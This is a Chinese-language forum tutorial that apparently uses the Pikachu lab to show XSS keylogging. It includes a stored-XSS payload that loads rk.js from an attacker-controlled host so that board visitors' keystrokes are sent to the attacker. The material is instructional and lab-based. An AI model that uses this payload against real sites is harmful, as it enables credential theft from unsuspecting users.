搜索
查看: 2312|回复: 0

xss漏洞利用之键盘记录

[复制链接]

632

主题

921

帖子

2374

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2374

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-11-6 15:57:55 | 显示全部楼层 |阅读模式
键盘记录
修改 /var/www/html/pikachu/pkxss/rkeypress 下 rk.js 中的IP地址为攻击者地址
rk.js 是攻击代码,我们可以把这个 js 文件放到我们的恶意站点上,然后通过有 XSS 漏洞的页面去调用
这个文件可以记录用户的键盘操作,然后异步发送给攻击者
我们可以用下面的Payload测试一下
  1. <script src="http://192.168.1.14/pkxss/rkeypress/rk.js"></script>
复制代码
当每个人访问留言板时,就会激活上面的代码。从而获取键盘记录。



有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表